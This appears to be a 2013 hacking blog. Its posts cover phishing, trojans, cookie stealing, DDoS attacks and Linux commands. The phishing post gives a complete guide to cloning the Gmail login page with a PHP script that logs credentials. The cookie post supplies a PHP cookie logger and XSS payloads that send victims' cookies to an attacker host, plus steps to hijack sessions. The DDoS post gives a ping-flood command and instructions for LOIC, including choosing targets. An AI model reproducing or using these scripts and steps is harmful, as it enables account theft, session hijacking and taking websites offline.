Blogger Widgets

Friday, 27 September 2013

Phishing (For beginners and a revision for elite hackers) #Hacker #Phishing #Infosec


Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.


1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.


2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.



3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.


4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.


Code:



<?php // This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.



Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;

?> // Marks the end of the PHP program.




5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.


6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”[size=78%].[/size]


7. This will highlight the first occurrence of the word “action” in the script.There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google.Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.


8. Save and close the file.


9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.


10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.



11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL.
As you can see if you fell for this the hacker would have your email and password. Scary, eh?



Thursday, 19 September 2013

How Trojans Works #Trojan #TrojanHorse #Infosec #Malware #Hacker #Exploits




# RATs (Remote Access Trojans) are malicious destructive programs that run invisibly on victim PCs and permit an intruder control remotely. Intruders usually bind Trojan horses in games and other small programs that unsuspecting users then execute on their PCs.
Exploited users either download or then execute these upon tricked.
RATs come in # client and # server components. Hackers launch the server program on a victim's machine by binding the installing component to some other legitimate program. After defining the server executable's behavior, the intruder generates the program, tricking the host machine's owner into running it, where the hacker makes his own computer the client side.

Side effects of Trojan
RATs can delete and modify files, format hard disks, upload and download files and do a host of other activities.
First, the ability to capture every screen and keystroke means that intruders can gather users' passwords, directory paths, drive mappings, medical records, bank- account and credit card information, and personal communications. If we have a WebCam, many RATs can turn it on and capture videos! Popularly known as web-cam hacking.

Detecting and Removing RATs
A major challenge is detection and removal of RATs. Typical antivirus scanners are less likely to detect
RATs than worms or viruses because of binders and intruder encryption routines. Also, RATs have the potential to cause significantly more\ damage than a worm or virus can cause.
Apart from the fact that an antivirus scanner can detect and delete these Trojans, its not fully guaranteed.
Some of the popular softwares to combat Trojans are
#Malwarebytes Anti- malware , #SpyHunter and  #Trojan Killer.
Also the most effective tip is the fact that users should never click on suspicious documents from unknown senders or download and extract any kind of email attachments without properly judging the type of content it may have, as it is said Prevention is better than cure..


Wednesday, 18 September 2013

Cookie Stealing(Session Hijacking) #SessionHijacking #WebAdmin #Javascript #Java #Php

 

Cookies Stealing

Here we show how you can hack a session using javascript and php.Everyone knows what XSS is, right? Good, I’ll spare you the definition. A common use for XSS is stealing cookies to hijack sessions and gain access to restricted web content. Cookie stealing is typically done by forcing a target’s browser to issue some sort of GET request to a server controlled by the attacker which accepts the target’s cookie as a parameter and processes it in some way. In most cases, when a cookie stealing XSS attack is successful, it generates a visual clue which can tip off the target. While it is too late at this point, stealth has been compromised, and could be the difference between the user keeping the session active, or clicking ‘log out’ and rendering your stolen cookie invalid.
 

Cookies Stealing And Session Hijacking
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged every time it accesses the server. A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time. Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

Cookies Stealing
What can we do after stealing cookie?
Well,as we know web sites authenticate their user’s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.


PHP Code:

<?php
function GetIP()

{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], “unknown”))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = “unknown”;
return($ip);
}
function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);
if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
“);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n”);
fclose($log);
}
logData();
?>

Save the script as a cookielogger.php on your server. (You can get any free webhosting easily such as justfree,x10hosting etc..)
Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.
 


Cookies Stealing
Now for the hack to work we have to inject this piece of javascript into the target’s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites don't allow javascript so you gotta be lucky to try this.The best way is to look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookie logger on your host.
Code:
<script language=”Java script”>
document.location=”http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>

You can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”>Click here!</a>

Clicking an image also can activate the script. For this purpose you can use the below code.
Code:
<a href=”java script:document.location=’http://www.yourhost.com/cookielogger.php?cookie=’+document.cookie;”&gt;
<img src=”URL OF THE IMAGE”/></a>

All the details like cookie, ipaddress, browser of the victim are logged in to log.txt on your hostserver. In the above codes please remove the space in between javascript.



 

Hijacking the Session:
Now we have cookie, what to do with this..? Download cookie editor mozilla plugin or you may find other plugins as well.Go to the target site–>open cookie editor–>Replace the cookie with the stolen cookie of the victim and refresh the page. Thats it!!! you should now be in the victim's account.






Tuesday, 17 September 2013

How You Can Protect Yourself On The Cyberspace #Infosec #CyberSpace #Internet


Cyberspace is a domain characterized by the use of electronics and the electromagnetic spectrum to store, modify and exchange data via networked systems for example the Internet

This is probably the most important part of the tutorial as this is where the most incidents occur due to infections or traps.

Infections or traps can range from:

-RATs (Remote Access Tool) which essentially give completely control of your computer.

-Keylogging which retains a log of all the keys you ever press on your keyboard.

-Phishing which retains a log when you manually input your information on a fake website emulating an original website.

-And more, but those above are the most common.
Around 90% of malware on the internet was coded to infect Windows Operating systems. I got that number from PC World about a year ago, forgive me if it's incorrect now. Anyway, assuming that you run on Windows you are the ones are the highest risk of getting targeted or infected.

You will want to always have your computer clean and secured having the proper tools. All these tools are the best of the best and are all free. They are probably better than paid security software.
How do I know this? Well, there are websites where you can scan malware after you crypt them (making them undetectable) to ensure that they are not detected by Anti-virus of any kind. Avira is the one that people always have a hard time bypassing, so I can safely say that it's the best from my personal experience of crypting and scanning.
 

Download and install all these tools below and I can assure you that your computer will be protected 1000% better than what it might be as of now. Get the free versions.
1.http://www.malwarebytes.org/
2.http://personalfirewall.comodo.com/

3.KeyScrambler Pro 2.7 - Follow the instructions on that link on how to get it for free. This software helps to encrypt everything you type on the internet.

4.If you use Firefox, get this: http://www.eff.org/https-everywhere
It encrypts all your website visits as https:// rather than http:// which makes you more secured as well.

5. FireShepherd,
A small console program that floods the nearby wireless network with packets designed to turn off FireSheep, effectively shutting down nearby FireSheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep. http://notendur.hi.is/~gas15/FireShepherd/
The program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone.
-Know that this is only a temporary solution to the FireSheep problem, created to give people the chance to secure themselves and the others around them from the current threat, while the security vulnerabilities revealed by FireSheep are being fixed.
The other option is using a different operating system which has a lower percentage of being targeted. You don't have to spend tons of money on Apple computers, instead you can get a free operating system from the Linux distributions.
The easiest to use and most similar to Windows looks is Ubuntu. You can install Ubuntu as a normal program on Windows and once it restarts, it shows you the option to choose Ubuntu over Windows.


Legendary DDOS Attack #DDOS #Infosec #Hacker #DOS #WebAdmin


WHAT IS DOS ATTACK?
Denial of Service(DoS) Attack is a fatal attempt by an external agent to cause a situation where the actual resource(victim undergoing attack) becomes unavailable
to the actual visitors or users. This is usually done by overwhelming the target victim with illegitimate traffic in the form of broken/unsolicited page access requests.
Distributed Denial of Service(DDoS) Attack is an advance form of DoS where the attacking agents are distributed over the huge network (or internet)
How DoS Attacks are executed?
DoS Attacks are usually executed by flooding the target servers with unsolicited data packets in unprecedented manner. This may be done by mis-configuring network routers or by performing smurf attack on the victim servers. This results in, Capacity Overflow?, followed by Max Out of system resources, which makes the target service unavailable, either temporarily or permanently (In case of hardware targeted DoS attack) to the intended users.
In case of DDoS attack, the origin of unsolicited data packets (for the purpose of flooding the bandwidth/resource of the victim servers) are distributed over a large
Network (or internet). The overall mechanism of DDoS Attack involves a huge quantity of compromised network nodes (computers connected to internet), governed by agent handlers, which are further controlled centrally by the actual attacker.
The massive number of compromised computers on the internet are then unknowingly governed by the source attacker to demand access to the targeted victim within a minimal time span, which further causes saturation of limited system resources and results in eventual shutdown of the targeted service.
The most common method employed to compromise massive amount of user agents on the internet (to actually execute DDoS Attack) is by plaguing as many computers as possible over the internet with malware/trojan, meant for that particular purpose.
Such trojans can either spread via email attachments or via Peer-to-peer networks. Whatever be the method of spreading out, once the intended trojan is silently installed on the uninformed computer agent, that user agent has actually been compromised, which is then called as a Zombie or Botnet. Further, it becomes a prerogative of the source attacker to indirectly command some or all its Zombie agents(or botnets) for demanding access to the target service.

What are other variants of DoS attacks?

There are many other attacks of similar nature and purpose such as smurf attack,nuke bomb, ping of death, banana attack, phlashing among many others.
How are they counteracted?
The best way to defend a web service from faltering due to DDoS attack is to keep backup resources of the system intact. As the aim of such attack is to max out system resources, if the system resources are already abundant and well prepared to face that sudden peak of traffic at any moment, most chances are that your web service will survive DoS (or even DDoS) attack.
What implications can DDoS Attacks have?
If the attack is only limited to overwhelming and resource consuming traffic, the implications are limited to service unavailability for couple of hours (or few days in exceptional cases). This not only stresses the website administrators financially but also results in loss of market reputation and puts a question mark on the reliability of the web service.
In case of hardware targeted DoS Attacks, financial losses can magnify to great extent as hosting infrastructure has to be replaced on urgent basis. This can also lead to critical data loss, if backup procedures aren?t up to the mark.
With more and more DDoS attacks happening these days, companies and Internet properties are using various types of DDoS Mitigation strategies to avoid any worst case scenario.
 




DDOS ATTACK TYPES:-
 

1) Ping Of Death:- The ping of death attack sends oversized ICMP
datagrams (encapsulated in IP packets) to the victim.The Ping
command makes use of the ICMP echo request and echo reply
messages and it's commonly used to determine whether the remote
host is alive. In a ping of death attack, however, ping causes the remote
system to hang, reboot or crash. To do so the attacker uses, the ping
command in conjuction with -l argument (used to specify the size of the
packet sent) to ping the target system that exceeds the maximum bytes
allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable
to the ping of death attack.
 

2) Teardrop Attack:- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in a single packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)

When the target system receives such a series of packets, it cannot reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.
 

3) SYN - Flood Attack:- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems' memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.
 

4) Land Attack:- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYNpacket include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.
 

5) Smurf Attack:- There are 3 players in the smurf attack–the
attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging thenetwork and preventing legitimate users from obtaining network services.
 

6) UDP - Flood Attack :- Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS by connecting the chargen to echo ports on the same or another machine and generatinglarge amounts of network traffic.

DDOS ATTACK BASIC TUTORIAL FOR BEGINNERS:-
 

Dos attacks-"Denial of Service” Attack
It's the attack to deny the service to the legitmate user ,so that he suffers
there are several reasons to do that.
Mostly likely reason is „NAST-YINESS?
Okay there are two ways for dos attacks one is the lame way and the other is the elite way
 


Lame way

Email Bombs – it s the technique in which a person email Alc is flooded with emails, it's the lamest form of DOS attack. All a person has to do is go on the net get some email bomber like UNA or KABOOM put the victims address and there ya go , his email address will be flooded with the unwanted emails, there is also another way put his email address into some porn subscription he will get bombed without you doing anything ,LOL When the victims email alc gets flooded he has a pain in differentiating and deleting the unwanted emails and it's the hugee task. And if the victim is the admin of the server and his email alc there is flooded it also looses his disk space.
Continous login – suppose a server is configured to allow only specified amount login attempts then, and you know his username you can lock his account, by attempting to connect by his name to the server which will lock his account and there ya go , the legitmate user won’t be able to log in ,the reason, you locked his Alc.
Okay now the neophyte way, it’s not that elite way but somewhat better than the lame way, atleast you are doing something technical.
 

Syn Flooding
This is a exploit in tcp/ip method of handshake. Read some basics on tcp/ip okay let’s start.
Normal way:-
Syn-packet is sent to the host by the client who intends to establish a connection
SYN Client --------------? Host
Then in the second step host replies with syn/ack packet to the client
SYN/ACK Client ?--------------Host
Then in the third and the last step
Client replies with ack packet to the host and then the threeway handshake is complete
Okay got it now ..?
Now in attack
Several syn packet is sent to host via spoofed ip address(bad or dead ip addresses) now then what happens the host replies with syn/ack packet and host waits for the ack packet. But however the ip address don?t exist it keeps waiting ,thus it queues up and eats the system resources and thus causes the server to crash or reboot.
 

Land attack
A land attack is similar to syn attack but instead of bad ip address the ip address of the target system itself is used. This creates an infinite loop, and the target system crashes. But however almost all systems are configured against this type of attacks.
 

Smurf Attack
A smurf attack is a sort of brute force dos attack, in which a huge number normally the router using the spoofed ip address from within the target network , so when it gets the ping it echos it back causing the network to flood. Thus jamming the traffic
 

Udp flooding
This kind of flooding is done against two target systems and can be used to stop the services offered by any of the two systems. Both of the target systems are connected to each other, one generating a series of characters for each packet received or in other words, requesting UDP character generating service while the other system, echoes all characters it receives. This creates an infinite non-stopping loop between the two systems, making them useless for any data exchange or service provision.
 

 



PING OF DEATH
This Attack don’t work now as all the servers are patched against this type of attack. In this attack a target system is pinged with data packet exceed the normal size allowed by the tcp/ip i.e 65536.This will cause the system to reboot or Hang up.
 

Tear Drop
When the data is passed from one system into another it is broken down into smaller fragments, and then in the receiving host they are again reassembled.
These packets have an offset field in there TCP header part which specifies from which part to which part that data carries or the range of data that it is carrying. This along with the sequence numbers, this helps the receiving host to reassemble the data. In tear drop the packets are sent with the overlapping offset field values thus the receiveing host is unable to reassemble them and crashes.
DDOS ATTACK MANUALLY:- 

First Open Cmd From Run => Cmd Now Follow These Steps -:
o Now Type This Command In CMD : Ping www.anysite.com
o And You Will Get The I.P of Victim
o Now Type => ping (i.p of site) –t –l 65000
Here 65000 is packets
Now Your PC Will Send A Huge Traffic To That Site…:D
Check That Site after 1 Hours it will be Down..!!!
Try This From More PC For A Good Response..!!!

DDOS ATTACK BY LOIC:-
For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", this tool created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites.
An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.
Download LOIC (Low Orbit Ion Cannon) :
www.sourceforge.net/projects/loic
Type the target URL in the URL box. Click lock on. Change the threads to 9001 for maximum efficiency. Click the big button " IMMA FIRIN MAH LAZAR!"
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!
 

DDOS ATTACK BY JANIDOS:-
Download From Here :http://www.mediafire.com/?sn1caa9c2ad4dzc
After Downloading Open The Toolkit And Click On Try Weak Edition  this Ddos tool coded on visual basic 6 firstly you must send this ocx's to system32
comdlg32.ocx
msinet.ocx
mscomctl.ocx
mswinsck.ocx
This Tool will be detected supicious by Antiviruses because ddos tool works on port 80 & it is also a backdoor port soo it is a false positive detection dont worry this tool is clean.




Monday, 16 September 2013

Basic Linux Commands #Linux #OS




Modes of Operation

The linux operating system used for the PARTICLE DAQ system can be used either in a terminal mode where you type commands or in a Windows Explorer style graphical user interface (GUI).
The Explorer-like GUI can be used for file manipulation functions (e.g., copying a file to a floppy) or deleting or moving files on the disk. It cannot be used to run the PARTICLE DAQ itself.
To begin using the Explorer-like GUI, double click on the icons on the Desktop. For the most part, Explorer mode will be familiar from Windows or MAC OS, so with a few exceptions, this information will not focus on this. Where something is much more easily done from
Explorer mode, it will be highlighted here.
To begin working in the terminal mode, you will need to open a terminal. This can be accomplished by clicking on the terminal icon in the bottom icon bar, by using the main menu (footprint icon in lower left of bottom icon bar) System Tools -> New Terminal.
The Manual (terminal mode)
Man -This command brings up the online Unix manual. Use it on each of the commands below.
For Example:
man pwd -You will see the manual for the pwd command.
Accessing files in Folders (Directories) in terminal mode
pwd - Shows what directory (folder) you are in.
In Linux, your home directory is /home/particle
Let's suppose you have several data files (data1, data2 ... etc.) in a directory called muondata.
Then suppose the directory muondata is an entry in your main home directory, /home/particle.
If you are in your home directory (where terminals start) and type pwd, you will see /home/particle.
If you were in the muondata directory, pwd would give you /home/particle/muondata instead
The last slash after a directory name is optional.
As you can see, each slash (/) indicates another sub-directory.
Cd -Changes directories.
Examples of relative movement among directories:
cd muondata-Moves down from your current directory into the muondata sub-directory
cd -Moves up one directory (yes, include the two little dots)
You can also move directly into directories
cd /home/particle/muondata - Moves from ANY directory into the muondata sub-directory of your home directory.
cd ~ -Takes you back to your home directory (/home/particle)
Making or Removing a Directory (terminal mode)
mkdir dirName - Creates a directory with name dirName.
For Example:
mkdir temp - Creates the directory temp.
rmdir dirName - Removes a directory dirName.
For Example:
rmdir temp - Removes the directory temp.
Looking at or Finding your Files (terminal mode)
Ls - Lists files.
If you add -al after ls it will give more details for each file. Such as, size, permissions, owners, dates etc.
ls al - You'll see a huge list of files that you can't see with the 'ls' command alone and lots of details.
If you see such a long list of files that they scroll off the terminal screen, one way to solve the problem is to use:
ls -al |more Shows one screen of file names at a time.
less data1 -Dumps the contents of the data1 file to your screen with a pause at each line so you don't miss any contents as they scroll. You may move through the file using page up, page down, home and end keys. When done with less you use the q key to get back to the main
Terminal.
whereis data1 -Shows you the location of the data1 file.
Altering your Files
rm data1 - Deletes the file data1 in the current directory.
rm -i muon* - Removes all of your muon data files
(careful!! rm * will remove ALL your files)
The "-i" makes the computer prompt before removing each file. If you really want to work without a net, omit the "-i".
cp data1 newdata/ - will copy the file data1 to the directory newdata (assuming it has already been created)
mv data1 newdata/ - moves the file data1 to the folder newdata and deletes the old one.
To remove the disk, you must first right-click on the desktop icon, and select Unmount volume or Eject (either does the same thing). Things are more complicated by possible in the terminal mode:
mount Mounts a drive to the operating system.
Linux does not 'see' the floppy drive until you tell it to.
df- Shows the disk usage. This will tell you how much disk space you have left on your hard drive as well as the flash drive
So more commands are as follows :



A
alias Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index
B
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop •
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)
C
cal Display a calendar
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions •
continue Resume the next iteration of a loop •
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts
D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes •
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage
E
echo Display message on screen •
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands •
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
F
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file



G
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups Print group names a user is in
gzip Compress or decompress named file(s)



H
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command •
history Command History
hostname Print or set system name
I
iconv Convert the character set of a file
id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
J
jobs List active jobs •
join Join lines on a common field
K
kill Stop a process from running
killall Kill processes by name

L
less Display output one screen at a time
let Perform arithmetic on shell variables •
ln Create a symbolic link to a file
local Create variables •
locate Find files
logname Print current login name
logout Exit a login shell •
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
M
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
 mtools Manipulate MS-DOS files
mtr Network diagnostics (traceroute/ping)
mv Move or rename files or directories
mmv Mass Move and rename (files)
N
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively
O
open Open a file in its default application
op Operator access
P
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data •
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory



Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
R
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input •
readarray Read from stdin into an array variable •
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
S
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell •
symlink Make a new name for a file
sync Synchronize data on disk with memory
T
tail Output the last part of file
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command •
U
ulimit Limit user resources •
umask Users file creation mask
umount Unmount a device
unalias Remove an alias •
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
uptime Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
V
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor
vmstat Report virtual memory statistics
W
wait Wait for a process to complete •
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which Search the user's $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
X
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user's preferred application.
yes Print a string until interrupted
. Run a command script in the current shell
!! Run the last command again